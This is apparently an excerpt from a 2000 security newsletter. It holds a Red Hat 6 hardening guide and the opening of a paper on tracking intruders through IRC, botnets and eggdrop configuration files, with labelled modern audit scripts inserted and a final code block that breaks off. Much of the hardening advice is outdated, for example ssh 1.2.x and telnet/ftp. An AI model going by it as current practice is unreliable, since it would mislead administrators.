      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Preparing your linux box for the Internet 
      Armoring Linux 

      Lance Spitzner 
      http://www.enteract.com/~lspitz/papers.html 
      Last Modified: 25 June, 2000 
      
      Organizations throughout the world are adopting Linux as their production 
      platform.   By connecting to the Internet to provide critical services, 
      they also become targets of opportunity.  To help protect these Linux 
      systems, this article covers the basics of securing a Linux box.  The 
      examples provided here are based on Red Hat 6.0, but should apply to most 
      Linux distributions. 

      Installation
      The best place to start in armoring your system is at 
      the beginning, OS installation. Since this is a production system, you 
      cannot trust any previous installations. You want to start with a clean 
      installation, where you can guarantee the system integrity. Place your 
      system in an isolated network. At no time do you want to connect this box 
      to an active network nor the Internet, exposing the system to a possible 
      compromise. I personally witnessed a system hacked by a script kiddie 
      within 15 minutes of connecting to the Internet. To get critical files and 
      patches later, you will need a second box that acts as a go between. This 
      second box will download files from the Internet, then connect to your 
      isolated, configuration "network" to transfer critical files or burn the 
      patches to a CDROM. 

      Once you have placed your future Linux box in an isolated network, you are 
      ready to begin. The first step is selecting what OS package to load. As of 
      RH 6.0, you have three options, Workstation, Server, and Custom (default).  
      I highly recommend Custom, as this allows you to choose what 
      services are added and how the system is partitioned.  The idea is to load 
      the minimum packages, while maintaining maximum efficiency.   The less 
      software that resides on the box, the fewer potential security exploits or 
      holes.  This means if you do not need a News or Real Audio Server, don't 
      install it.  The nice thing about Linux is, if you change your mind, it is 
      easy to add packages later.  Regardless of which installation you choose, 
      I would add the manual pages and HOWTO docs.  I find the on-line man pages 
      and docs to be a critical resource that add little risk to your system. 

      If you selected Custom, you will be asked to partition your system.  I 
      always like to make root as big as possible and just throw everything in 
      there, then you do not run out of room in the future.  However, we do need 
      several partitions to protect the root drive.  If we were to fill 
      the root partition with data, such as logging or email, we would cause a 
      denial of service, potentially crashing the system. 

      Therefore, I always recommend a separate partition for /var, this is where 
      all the system logging and email goes.  By isolating the /var partition, 
      you protect your root partition from overfilling.   I've found 400 MB to 
      be more than enough for /var (increase this if your system will have 
      a lot of mail).  You may also consider making a separate partition for 
      specific application purposes, especially applications that store 
      extensive logging. If you are going to have users on your system you do 
      not trust, you may also want to create a separate /home directory, so 
      malicious users cannot fill the / partition. For a standalone server, 
      your partitions may look as follows: 
      
      /        - everything else 
      /var     - 400 MB 
      swap     - (I normally go with 256 MB) 
        
      
      Once the system has rebooted after the installation, be sure to install 
      the recommended security patches. For Red Hat, you can find these security 
      patches at Red Hat's errata support site.  Patches are critical to 
      armoring a system and should always be updated. bugtraq@securityfocus.com 
      or redhat-watch-list-request@redhat.com are excellent sources for 
      following bugs and system patches.  Without these patches, your system can 
      be easily compromised.  Be sure to use your go between box to get the 
      patches, the Linux box should always remain on an isolated network. For 
      Red Hat, once you download the rpm, you can easily update your system 
      using the following syntax.  An excellent example of this is the security 
      update for wu-ftpd 
      
      rpm -Uvh wu-ftpd-2.6.0-14.6x.i386.rpm 
      
      For systems that are already on-line, you can ftp the rpm and install it at
      the same time, using the following syntax. 
      
      rpm -Uvh ftp://updates.redhat.com/6.1/i386/wu-ftpd-2.6.0-14.6x.i386.rpm 
      
      As of RH 6.1, there is a new utility for patches called 'up2date'. I 
      highly recommend you try this excellent utility. When run on a local 
      system, it determines which .rpm's need to be updated, gets those rpm's 
      from Red Hat's web site, and then downloads and installs the updated 
      files. This tool is highly customizable and easy to use. 

      Eliminating Services
      Once you have loaded the installation package, 
      patches, and rebooted, we are now ready to armor the operating system. 
      Armoring consists mainly of turning off services, adding logging, tweaking 
      several files, and configuring TCP Wrappers. First we will begin with 
      turning off services. 

      By default, Linux is a powerful operating system that executes many useful 
      services. However, most of these services are unneeded and pose a 
      potential security risk. The first place to start is /etc/inetd.conf. This 
      file specifies which services the /usr/sbin/inetd daemon will listen 
      for. By default, /etc/inetd.conf is configured for a variety of services, 
      you most likely only need two, ftp and telnet. You eliminate the remaining 
      unnecessary services by commenting them out (example A).  This is 
      critical, as many of the services run by inetd pose serious security 
      threats, such as popd, imapd, and rsh.  Confirm what you have commented 
      out with the following command (this will show you all the services that 
      were left uncommented) 

       grep -v "^#" /etc/inetd.conf 

      The next place to start is the .rc scripts, these scripts determine what 
      services are started by the init process. For Red Hat, you will find these 
      scripts in /etc/rc.d/rc3.d (or /etc/rc.d/rc5.d if you automatically boot 
      to a GUI, such as Gnome or KDE).  To stop a script from starting, 
      replace the capital S with a small s. That way you can easily start the 
      script again just by replacing the small s with a capital S. Or, if you 
      prefer, Red Hat comes with a great utility for turning off these services.  
      Just type "/usr/sbin/setup" at the command prompt, and select "System 
      Services", from there you can select what scripts are started during the 
      boot up process.  Another option is chkconfig, which you will find on most 
      distributions.  The following startup scripts may be installed by default 
      but are not critical to system functioning.  If you don't need them, turn 
      these scripts off.  The numbers in the names determine the sequence of 
      initialization, they may vary based on your distribution and version.  
      Scripts that start with a capital K instead of a capital S are used to 
      kill services that are already running. 
      
      S05apmd       (You only need this for laptops) 
      S10xntpd     (Network time protocol) 
      S11portmap   (Required if you have any rpc services, such as NIS or NFS) 
      S15sound     (Saves sound card settings) 
      S15netfs     (This is the nfs client, used for mounting filesystems from a nfs server) 
      S20rstatd    (Try to avoid running any r services, they provide too much information to remote users) 
      S20rusersd 
      S20rwhod 
      S20rwalld 
      S20bootparamd (Used for diskless clients, you probably don't need this vulnerable service) 
      S25squid     (Proxy server) 
      S34yppasswdd (Required if you are a NIS server, this is an extremely vulnerable service) 
      S35ypserv    (Required if you are a NIS server, this is an extremely vulnerable service) 
      S35dhcpd     (Starts dhcp server daemon) 
      S40atd       (Used for the at service, similar to cron, but not required by the system) 
      S45pcmcia    (You only need this script for laptops) 
      S50snmpd     (SNMP daemon, can give remote users detailed information about your system) 
      S55named     (DNS server.  If you are setting up DNS, upgrade to the latest version of BIND,  http://www.isc.org/bind.html) 
      S55routed    (RIP, don't run this unless you REALLY need it) 
      S60lpd       (Printing services) 
      S60mars-nwe   (Netware file and print server) 
      S60nfs       (Use for NFS server, do not run unless you absolutely have to). 
      S72amd        (AutoMount daemon, used to mount remote file systems) 
      S75gated      (used to run other routing protocols, such as OSPF) 
      S80sendmail  (You can still send email if you turn this script off, you just will not be able to receive or relay) 
      S85httpd     (Apache webserver, I recommend you upgrade to the latest version, http://www.apache.org) 
      S87ypbind     (Required if you are a NIS client) 
      S90xfs       (X font server) 
      S95innd      (News server) 
      S99linuxconf  (Used to remotely configure Linux systems via browser, every black-hat's dream :) 
      
      To see how many services are running before you change the startup scripts, type 
      
      ps aux | wc -l 
      
      Once you are done with the installation and have turned off the startup scripts, type the command again and compare how the number of services has decreased. The fewer services running, the better. Also, confirm which are left running by executing the following command: 
      
      netstat -na --ip 
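
      The two steps of this section (commenting services out of /etc/inetd.conf and renaming S scripts to s) can be checked and applied with a short script. This is an added example, not part of the original paper: the function names are hypothetical, and the inetd.conf lines and rc directory it runs on are constructed samples in a temporary directory.

```shell
#!/bin/sh
# Added example (not from the paper). All sample file contents are constructed.

# inetd_unexpected CONF "ALLOWED": print enabled inetd services that are not in
# the space-separated allowlist (the paper keeps only ftp and telnet).
inetd_unexpected() {
    awk -v allowed="$2" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        /^[ \t]*#/ || NF == 0 { next }     # commented out or blank: disabled
        !($1 in ok) { print $1 }
    ' "$1" | sort -u
}

# rc_enabled DIR "NAMES": print start scripts (capital S + two digits) in DIR
# whose service name is in the space-separated list NAMES.
rc_enabled() {
    for path in "$1"/S[0-9][0-9]*; do
        [ -e "$path" ] || continue         # glob matched nothing
        script=${path##*/}
        name=${script#S[0-9][0-9]}         # S11portmap -> portmap
        for unwanted in $2; do
            if [ "$name" = "$unwanted" ]; then
                echo "$script"
            fi
        done
    done
    return 0
}

# rc_disable DIR "NAMES": rename each matching S script to a small s, so init
# skips it and it can be re-enabled by renaming it back. K scripts are untouched.
rc_disable() {
    for script in $(rc_enabled "$1" "$2"); do
        mv "$1/$script" "$1/s${script#S}"
    done
    return 0
}

# Constructed sample inetd.conf: two wanted services, one already commented
# out, two that should have been.
write_sample_inetd() {
    cat > "$1" <<'EOF'
# constructed sample
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -L -i -o
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
#shell  stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
pop-3   stream  tcp     nowait  root    /usr/sbin/tcpd  ipop3d
imap    stream  tcp     nowait  root    /usr/sbin/tcpd  imapd
EOF
}

# Constructed sample runlevel directory.
make_sample_rc() {
    mkdir -p "$1"
    for f in S10network S11portmap S20rwhod S60lpd S80sendmail K20nfs; do
        : > "$1/$f"
    done
}

demo=$(mktemp -d)
write_sample_inetd "$demo/inetd.conf"
make_sample_rc "$demo/rc3.d"
echo "inetd services still enabled but not wanted:"
inetd_unexpected "$demo/inetd.conf" "ftp telnet"
echo "startup scripts to turn off:"
rc_enabled "$demo/rc3.d" "portmap rwhod lpd"
rc_disable "$demo/rc3.d" "portmap rwhod lpd"
echo "runlevel directory afterwards:"
ls "$demo/rc3.d"
rm -rf "$demo"
```

      On a real system the arguments would be /etc/inetd.conf and /etc/rc.d/rc3.d, with the list of names taken from the scripts above that you do not need.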
      
      Logging and Tweaking 
      Once you have eliminated as many services as possible, we want to enable logging. All system logging occurs in /var/log.   By default, Linux has excellent logging, except for ftp.  You have two options for logging for ftp, configure /etc/ftpaccess file or edit
      /etc/inetd.conf.  I prefer to edit /etc/inetd.conf, as it is simpler (i.e. harder to mess up :).  Edit /etc/inetd.conf as follows to ensure full logging of all FTP sessions. 
      
      ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -L -i -o 
      
      --- From the man pages --- 
      
      If the -l option is specified, each ftp session is logged in the syslog 
      If the -L flag is used, command logging will be on by default as soon as the ftp server is invoked.  This will cause  the  server  to log all USER commands, which if a user accidentally enters a
      password for that command instead of the username, will cause passwords to be logged via syslog. 
      If the -i option is specified, files received by the ftpd(8) server will be logged to the xferlog(5). 
      If the -o option is specified, files transmitted by the ftpd(8) server will be logged to the xferlog(5). 
      
      --- snip snip --- 
      
      Next comes tweaking. This involves various file administration. The first thing we want to do is secure our /etc/passwd file (this is the database file that holds your user accounts and passwords).  First, we want to ensure our system is using /etc/shadow, this securely
      stores everyone's password as hashes in a file only root can access.  This protects your passwords from being easily accessed and cracked (one of the first exploits a hacker looks for).  The use of shadow passwords is default as of RH 6.0, however it never hurts to
      be sure. All you have to do is type the following command as root.  This automatically  converts your passwords to the /etc/shadow file. Of all the actions you can take to secure your system, I consider this to be one of the most important. 
      
      pwconv 
      
      The second step is to remove most of the default system accounts in /etc/passwd.  Linux provides these accounts for various system activities which you may not need.  If you do not need the accounts, remove them.  The more accounts you have, the easier it is to
      access your system.  An example is the "news" account.  If you are not running nntp, a news group server, you do not need the account (be sure to update /etc/cron.hourly, as this looks for the user "news"). Also, make sure you remove the "ftp" account, as this is the
      account used for anonymous ftp.  From the man pages. 
      
      man ftpd: 
      
             Ftpd authenticates users according to four rules. 
      
             4)     If  the  user name is ``anonymous'' or ``ftp'', an anonymous ftp account must be present in the password file (user ``ftp'').  In this case the user is allowed to log in by
      specifying any password (by convention this is given as the client host's name). 
      
      For an example of my /etc/passwd file, check out example C. 
      
      We also want to modify the file /etc/ftpusers (example D). Any account listed in this file cannot ftp to the system. This restricts common system accounts, such as root or bin, from attempting ftp sessions. Linux has the file by default.  Ensure that root stays in this file,
      you never want root to be able to ftp to this system.  Ensure that any accounts that need to ftp to the box are NOT in the file /etc/ftpusers. 
      
      Also, ensure that root cannot telnet to the system. This forces users to login to the system as themselves and then su to root. The file /etc/securetty lists what ttys root can connect to.  List only tty1, tty2, etc in this file, this restricts root logins to local access only. 
      ttyp1, ttyp2, are pseudo terminals, they allow root to telnet to the system remotely (example E). 
      
      Last, create the file /etc/issue. This file is an ASCII text banner that appears for all telnet logins (example B). This legal warning will appear whenever someone attempts to login to your system. If you want to continue using the same /etc/issue file, you will have to
      modify /etc/rc.d/init.d/S99local.  By default, Linux creates a new /etc/issue file on every reboot. 
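
      The file checks in this section (shadowed passwords, no "ftp" account, root listed in /etc/ftpusers, only local ttys in /etc/securetty) can be verified together. This is an added example, not part of the original paper and not a copy of its examples C, D or E: audit_tweaks, its finding labels and both sample trees are hypothetical and constructed, and the function takes a root prefix so it can run against them.

```shell
#!/bin/sh
# Added example (not from the paper). Sample files below are constructed.

# audit_tweaks ROOT: check ROOT/etc/{passwd,ftpusers,securetty} against the
# steps described above. Prints one finding per line, nothing if all pass.
audit_tweaks() {
    etc=$1/etc

    # Shadow passwords: after pwconv every password field in passwd is "x".
    awk -F: '$2 != "x" { print "UNSHADOWED " $1 }' "$etc/passwd"

    # The "ftp" account is what enables anonymous ftp logins.
    awk -F: '$1 == "ftp" { print "FTP_ACCOUNT " $1 }' "$etc/passwd"

    # root must be listed in ftpusers so it can never ftp to the system.
    if ! grep -qx 'root' "$etc/ftpusers" 2>/dev/null; then
        echo "FTPUSERS_MISSING root"
    fi

    # securetty: only local consoles (tty1, tty2, ...). Anything else, such as
    # the pseudo terminals ttyp1 and ttyp2, lets root log in over telnet.
    awk 'NF && $1 !~ /^tty[0-9]+$/ { print "SECURETTY_REMOTE " $1 }' "$etc/securetty"
    return 0
}

# A constructed tree that fails every check.
make_weak_tree() {
    mkdir -p "$1/etc"
    cat > "$1/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:CONSTRUCTEDHASH:500:500::/home/alice:/bin/bash
ftp:x:14:50:FTP User:/home/ftp:
EOF
    printf 'bin\ndaemon\n' > "$1/etc/ftpusers"
    printf 'tty1\ntty2\nttyp1\n' > "$1/etc/securetty"
}

# A constructed tree that passes every check.
make_hardened_tree() {
    mkdir -p "$1/etc"
    cat > "$1/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:500:500::/home/alice:/bin/bash
EOF
    printf 'root\nbin\ndaemon\n' > "$1/etc/ftpusers"
    printf 'tty1\ntty2\n' > "$1/etc/securetty"
}

demo_root=$(mktemp -d)
make_weak_tree "$demo_root/weak"
make_hardened_tree "$demo_root/hardened"
echo "weak tree findings:"
audit_tweaks "$demo_root/weak"
echo "hardened tree findings (none expected):"
audit_tweaks "$demo_root/hardened"
rm -rf "$demo_root"
```

      Called as audit_tweaks "" it reads the live /etc files; run it as root so the files are readable.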
        
      
      Connecting to your server 
      For those of you who will be doing remote administration, it is critical that you develop a secured, controlled way to connect to the server.  Often, you need remote access to your server for administration or the uploading of files, these communications need to be
      secured.  I will discuss two options here, ssh and TCP Wrappers. 
      
      I prefer ssh, as it encrypts all communication between you and the firewall.  TCP Wrappers will NOT protect your network traffic from sniffing.  Users can still capture all of your keystrokes  (including passwords) on the network.  If you are concerned about users
      capturing communications to your firewall, I recommend you replace telnet/ftp with ssh.  ssh will encrypt all communications to your server, allowing you both to upload files and administer the server in a secure manner.  ssh is similar to TCP wrappers in that it has its
      own layer of logging, and can limit what systems can connect to it.  For more information on ssh, you can find ssh here, including source for both ssh clients and server daemon.  I recommend you use ssh version 1.2.x, as version 2.x has a limiting license. Another ssh
      option is Openssh. 
      
      While TCP Wrappers does not encrypt, it does log and control who can access your system.  It is a binary that wraps itself around inetd services, such as telnet or ftp. With TCP Wrappers, the system launches the wrapper for inetd connections, logs all attempts and
      then verifies the attempt against an access control list. If the connection is permitted, TCP Wrappers hands the connection to the proper binary, such as telnet. If the connection is rejected by the access control list, then the connection is dropped.  Fortunately for us
      Linux users, TCP Wrappers is already installed, the only thing left for us to do is edit the /etc/hosts.allow and /etc/hosts.deny file.  These files determine who can and cannot access our systems.  Also, TCP Wrappers allows us to do fancy things, such as banners or
      spawn additional programs, such as safe_finger.  The syntax is relatively simple.  Put the IP address or networks in /etc/hosts.allow that you want to permit connections from.  Put IP addresses or networks in /etc/hosts.deny that you do not want to permit access.  By
      default, Linux allows connections from everyone, so you will need to modify these files.  2 recommendations when working with TCP Wrappers. 
      
         1.Use IP addresses instead of system or domain names. 
         2.Set up /etc/hosts.deny to deny everything (ALL), then permit only specific sites with /etc/hosts.allow. 
      
      For examples on how to setup /etc/hosts.allow and /etc/hosts.deny, see example F.  For more ideas on how to use TCPWrappers, check out Intrusion Detection. 
        
        
      
      For the Truly Paranoid 
      I consider the measures discussed above absolutely essential.  By following these steps, you have greatly improved your system's security, congratulations!  Unfortunately, your system is not 100% secure, nor will it ever be.  So, for the truly paranoid, I have added
      some additional steps you can take. 
      
      First we will create the wheel group.  The wheel group is a group of select individuals that can execute powerful commands, such as /bin/su. By limiting the people that can access these commands, you enhance the system security.  To create the group, vi the file
      /etc/group, create the group wheel, and add the system admins to the group.  Then identify critical system binaries, such as /bin/su.  Change the group ownership to wheel, and the permissions to owner and group executable only (be sure to maintain the suid or guid bit
      for specific binaries).  For /bin/su, the commands would be: 
      
      /bin/chgrp wheel /bin/su 
      /bin/chmod 4750 /bin/su 
      
      Second, we will lock down the files .rhosts, .netrc, and /etc/hosts.equiv.  The r commands use these files to access systems.  To lock them down, touch the files, then change the permissions to zero, locking them down. This way no one can create or alter the files. For
      example, 
      
      /bin/touch /root/.rhosts /root/.netrc /etc/hosts.equiv 
      /bin/chmod 0 /root/.rhosts /root/.netrc /etc/hosts.equiv 
      
      Third, we configure /etc/shadow to use MD5 hashes instead of the crypt(3) function.  This makes the encrypted password file far more difficult to crack.  This is done by modifying the PAM modules.  PAM (Pluggable Authentication Modules) is a suite of shared
      libraries that enable you to choose how applications authenticate users.  To learn more about PAM, check out ftp://ftp.us.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html. 
      
      In the old days, you had to manually modify the PAM modules to use MD5 hashes.  However, with Red Hat 6.0 or greater, you can select MD5 hashes with the setup utility.  Just type "setup" at the command prompt, then select "authentication configuration".  From
      there, you can choose to use MD5 hashes.  However, the MD5 hashes will not take effect until the user re-enters their password.  For those of you who do not have the setup utility (or have Red Hat 5.2 or earlier), you can still modify the PAM modules manually
      (example G). 
      
      For us bash users, I'm not a big fan of the .bash_history file.  I do not want people (including root) to know my command history.  So, in my .bash_profile, I export the following entry: 
      
      HISTFILESIZE=0 
      
      This means that nothing will be logged to my .bash_history file.  I will still have keystroke history and recall, the HISTSIZE env variable, but command history will not be written to the .bash_history file. 
      
      Last thing we can do is protect our system from physical access.  This mainly consists of setting up a password for our BIOS.  Also, you can password protect your system during boot-up by configuring /etc/lilo.conf with a password (password=xxx)  where xxx is
      your password.  However, keep in mind, once someone has physical access to your system, there is no guaranteed way to protect it. 
      
      IPChains 
      No discussion about Linux security would be complete without covering IPChains.  IPChains is packet filtering software that comes with the 2.2.x kernel and above. This means if you are running Red Hat 6.0 or later, you have it as part of your Linux installation kit. 
      IPChains is similar to Cisco Access Control Lists: it can control what packets can come in and out of your Linux box.  Primarily used as a firewall application, IPChains can also be used to armor your standalone Linux box.    To armor a standalone system, I configure
      IPChains to allow only TCP connections I initiate.  If anyone attempts to initiate any TCP connections to me, the connection is denied.  Since IPChains is not stateful, I do allow all UDP and ICMP connections.  Last, I log all denied connections; this lets me know if
      someone out there is being naughty :)  However, I drop but do not log all the broadcast/multicast traffic, as this would quickly fill up the system logs. A simple IPChains configuration to armor a standalone system would look something like this. 
      
      bash# ipchains -L
      Chain input (policy DENY):
      target     prot opt     source      destination                ports
      DENY       all  ------  0.0.0.0     anywhere                   n/a
      DENY       all  ------  anywhere    255.255.255.255            n/a
      DENY       all  ------  anywhere    BASE-ADDRESS.MCAST.NET/8   n/a
      ACCEPT     tcp  !y----  anywhere    anywhere                   any -> any
      ACCEPT     udp  ----l-  anywhere    anywhere                   any -> any
      ACCEPT     icmp ----l-  anywhere    anywhere                   any -> any
      DENY       all  ----l-  anywhere    anywhere                   n/a
      Chain forward (policy ACCEPT):
      Chain output (policy ACCEPT):
      
      To see the config files for this, see example H. To learn more about using IPChains as a firewall or for a standalone system, check out the IPChains HOWTO. 
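
      The input chain listed above, modelled as an added example (it is not the article's example H): a first-match evaluator in Python that shows which listed rule decides each kind of packet and whether it is logged. The Packet/Rule/evaluate names and the sample addresses are constructed for illustration, and the /32 mask on the 0.0.0.0 source rule is an assumption, since the listing shows no mask.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class Packet:
    proto: str           # "tcp", "udp" or "icmp"
    src: str
    dst: str
    syn: bool = False    # TCP flags, ignored for other protocols
    ack: bool = False
    fin: bool = False


@dataclass
class Rule:
    target: str                  # "ACCEPT" or "DENY"
    proto: str = "all"
    src: str = "0.0.0.0/0"       # "anywhere" in the listing
    dst: str = "0.0.0.0/0"
    not_syn: bool = False        # the "!y" option flag
    log: bool = False            # the "l" option flag

    def matches(self, pkt):
        if self.proto not in ("all", pkt.proto):
            return False
        if ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(self.src):
            return False
        if ipaddress.ip_address(pkt.dst) not in ipaddress.ip_network(self.dst):
            return False
        if self.not_syn:
            # -y selects connection requests: SYN set, ACK and FIN clear.
            return not (pkt.syn and not pkt.ack and not pkt.fin)
        return True


# The input chain from the listing, top to bottom.
INPUT_CHAIN = [
    Rule("DENY", src="0.0.0.0/32"),              # assumed /32 mask
    Rule("DENY", dst="255.255.255.255/32"),      # broadcast, dropped without logging
    Rule("DENY", dst="224.0.0.0/8"),             # BASE-ADDRESS.MCAST.NET/8
    Rule("ACCEPT", proto="tcp", not_syn=True),   # anything but a new inbound connection
    Rule("ACCEPT", proto="udp", log=True),
    Rule("ACCEPT", proto="icmp", log=True),
    Rule("DENY", log=True),                      # everything else, logged
]


def evaluate(pkt, chain=INPUT_CHAIN, policy="DENY"):
    """Return (target, logged, rule_index); rule_index is None if the policy decided."""
    for index, rule in enumerate(chain):
        if rule.matches(pkt):
            return rule.target, rule.log, index
    return policy, False, None


ME = "192.0.2.10"    # constructed address of the standalone box
SAMPLES = {
    "inbound connection attempt": Packet("tcp", "203.0.113.9", ME, syn=True),
    "reply to a connection I opened": Packet("tcp", "203.0.113.9", ME, syn=True, ack=True),
    "unsolicited UDP": Packet("udp", "203.0.113.9", ME),
    "broadcast": Packet("udp", "192.0.2.77", "255.255.255.255"),
    "multicast": Packet("udp", "192.0.2.77", "224.0.0.1"),
}


def run_samples():
    return {name: evaluate(pkt) for name, pkt in SAMPLES.items()}


if __name__ == "__main__":
    for name, (target, logged, index) in run_samples().items():
        print(f"{name:32} rule {index}: {target}{' (logged)' if logged else ''}")
```

      The unsolicited UDP packet is accepted: without connection state the chain cannot tell a reply from a probe, which is why the article accepts all UDP and ICMP.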
      
      Conclusion 
      We have covered some of the more basic steps involved in armoring a Linux box (Red Hat distribution). The key to a secure system is having the minimal software installed, with protection in layers, such as TCP Wrappers, IPChains, and shadowed passwords. There
      are many additional steps that can be taken, such as  tripwire (monitor changes in system binaries) and swatch (automated log monitoring and alerts). I also recommend that new Linux users check out Bastille Linux, a PERL script that can automatically secure your
      new Linux system, step by step. Remember, no system is truly 100% secure. However, with the steps outlined above, you greatly reduce the security risks. 
        
            
      @HWA
       

310.0 [IND] Paper: Tracking Hackers On Irc by Theory Group
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://theorygroup.com/Theory/irc.html  
       

      Tracking Hackers on IRC
      By: David Brumley [dbrumley@theorygroup.com]

      Few hackers are motivated purely by knowledge, science, and curiosity. Hackers continue to break into systems long after they become familiar with the technology. Instead, many continue to hack simply because of
      the social status it brings. For many, hacking *is* a social activity. Hackers meet online to discuss the latest hacking tools, their hacking conquests, and their personal life. System administrators and security
      professionals must become familiar with the social culture hackers dwell in to be truly effective.
      
      Internet Relay Chat (IRC) has replaced electronic bulletin boards as the social mecca for internet addicts. Hackers are no exception. Cybersleuths must understand the jargon and tools used in this virtual society. By
      understanding IRC tools and jargon a cybersleuth can determine the real identity of a hacker, from birthplace to current address and telephone number.
      
      System logs help administrators and security professionals track down criminals. They are useful evidence that a crime has been committed, but not much else. System logs show how and where the electronic bits came
      from, but they don't show *who* sent them. To prosecute successfully you must not only show where the intruder came from, but who was physically using the keyboard at that particular time. IRC can be a tool for
      finding out.
      
      For example, even with a full audit trail showing an intruder came from a particular account on a particular ISP, the most you can hope to obtain is billing information for the account. While sometimes sufficient, you
      still haven't shown *who* was using the keyboard at the other end of the connection. The account you traced may have been stolen, set up with false billing information, or shared among several in a household. An IRC
      savvy administrator, however, may be able to determine the exact identity of the intruder. How? By listening to the hacker on IRC and reviewing configuration information on IRC tools left behind. A hacker bragging
      about compromising your host is also a full confession when logged. The IRC tools may be configured to always allow particular ISP connections, which may help in pinning down their location. With a little deductive
      reasoning you can pin down who hacked your machine, what their name is, where they live, and even their favorite corner liquor store.
      
      There are literally dozens of IRC Networks. The most popular are DALnet, EFNet, and Undernet. Each IRC network is composed of hundreds, perhaps thousands, of channels where individuals with similar interests
      can chat real-time with each other. Channels are dynamic by nature. A channel is created the first time someone enters and destroyed when the last person leaves. The first person in a channel is also the channel
      operator, known as "chanops", or simply "ops". A channel operator is the super user for the channel: they can invite other users to the channel, set the topic, decide who can talk, and give or take operator status from
      others on the channel.
      
      On some networks, such as DALnet and Undernet, channels can be registered after creation. Registration allows the creator to become a channel operator every time they log on to their channel. Registration assigns
      ownership of a channel.
      
      Many IRC networks, including the ever popular EFNet, don't have channel registration. When you leave a channel, you leave all your privileges in that channel as well. You must be re-op'ed every time you join the
      channel. Hackers love dynamic networks like these because it allows them to take over channels. Hackers will force all legitimate users out of a channel until they are all that is left. When they are the only ones in the
      channel, they can op themselves. The primary method for forcing users off of a channel is a Denial of Service (DoS) attack. If the victim's computer is swamped by a DoS, it will time out and disconnect from IRC.
      
      Hackers who participate in these dynamic IRC networks have one primary goal: to keep operator status on the channels they frequent. To do this they must protect against others trying to take over their channel, rogue
      administrators randomly de-oping them, and deal with the inevitable denial of service attack. To solve these problems, hackers have come up with ingenious ways to create redundant connections from multiple hosts to
      an IRC network.
      
      The simplest solution is to run multiple IRC clients, such as ircII or BitchX from several hosts. By running the clients under screen(1), a unix terminal multiplexer, they can detach IRC sessions into the background and
      reattach to them later. Each session corresponds to one nickname on the IRC network. If one host goes down, he can always re-attach to a running session on another machine. Since each nickname has operator
      status, the whole scheme is redundant. It is up to the intruder, however, to maintain daily every IRC session on every host - a very labor intensive activity.
      
      IRC 'bots', short for robot, solve the problem of 'hands-on' administration. The purpose of a bot is to sit on IRC and monitor channels for events. In a very simple sense bots are only automated IRC clients. Running
      stand alone, a bot will automatically op friends (as specified in the configuration file), enforce bans for channel misuse, and provide some channel misuse control. The true power of bots, however, is their ability to link
      together to form "botnets". Each bot on a botnet serves as a redundant backup, automatically oping friends and other bots, enforcing channel bans, and ensuring a party line exists.
      
      Each bot on the botnet is a node. The botnet administrator appoints a master node, with the rest becoming slaves. The master node is in charge of distributing botnet configuration information with each slave. After
      initial configuration, the botnet administrator need only change configuration information on the master. The master will then automatically take care of updating all the sub-nodes.
      
      To add a bot to the network only a simple and static configuration file that specifies the master is needed. Once the new bot starts up, it will automatically contact the master and pull over the requisite configuration
      information to become a node on the botnet. The advantage to a hacker is enormous. For each new account or system compromise, the hacker need only upload the actual executable and a simple configuration file.
      Once started, the new bot automatically downloads all information including current lists of channels, friends, and users. The new bot will also then automatically update every time the configuration on the master is
      changed.
      
      The most famous bot is "eggdrop", available at http://www.eggdrop.net. It serves as a good model for the typical bot. Its configuration file is divided up into three logical sections (sometimes in three separate files,
      sometimes merged into one): user information, channel information, and bot information.
      
      Channel information can be recognized by the "channel add" TCL command. Following the channel name is a list of options to apply to that channel. A sample eggdrop channel file looks like:
      
      
              channel add #myhacker {
                      chanmode "+ismt"
                      dont-idle-kick
                      +userbans
                      +protectops
              }
      
      The chanmode defines what mode the channel should be. In this particular example channel #myhacker is invite only (i), secret (s), moderated so that only channel operators can talk (m), and only channel operators
      can change topics (t).
      
      The last three items define eggdrop configuration variables. Entries that begin with a plus (+) will enable options, entries that begin with a minus (-) will disable options. Entries with neither a plus nor a minus simply define
      a variable, i.e. make it true. In this particular example the bot will not kick idle users from #myhacker, it will let user operators (as opposed to other bots on the botnet) ban people, and will automatically re-op de-oped
      users. For a full list of options, see the example configuration file that comes with the eggdrop distribution.
      
      A user entry for an eggdrop bot can consist of four lines. The first line always contains the nickname, password, and flags of the bot user. The remaining three lines all use the first two characters to identify the type
      of configuration information. Entries that start with a "-" list user identifiers. To a bot, a user's identity is not their nickname, but the username@hostname.domain.zone where they are connecting from.
      
      A line that begins with ":" is a botnet configuration entry. It lists HOSTNAME:PORT that the particular bot for that user will listen on. When two bots communicate they use the port on the host listed.
      
      Lines that begin with "!!" or "." contain time stamp information on the user. Entries beginning with "!!" are the channel name and time stamp where the user was last seen by the bot. Entries with "." are the
      modification time of the entry itself. All times are kept in UNIX epoch format.
      
      User files often contain dozens of bot users. If you've found an eggdrop configuration file on a compromised host, chances are most of the entries in the file are also compromised hosts or accounts. A quick note to the
      administrator of each domain explaining that you've found a hacker configuration file that references his domain is appropriate. You can also use the information in creating an MO (Modus Operandi) file for the
      hacker. People listed in the user file are often friends of the hacker (whom you may see in the future :) or alternate nicknames the hacker may be using.
      
      Here's an example of eggdrop user file:
      
      
      eleet     lypmjwfp2ee         fbs                      /0 0 0 0
      -         *!eleet@*.elaine.Stanford.EDU, *!eleet@*.myth.stanford.edu
      :         firebird.stanford.edu:60000
      !!        895178133 #stanford
      .         {created 894412528}
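
      A parser for the user-file layout just described, as an added example that is not part of the original paper or of eggdrop: it reads each entry's line types ("-", ":", "!!", "."), converts the epoch time stamps, and lists the hosts whose administrators the paper suggests notifying. The function names are hypothetical, and the only input is the sample entry above.

```python
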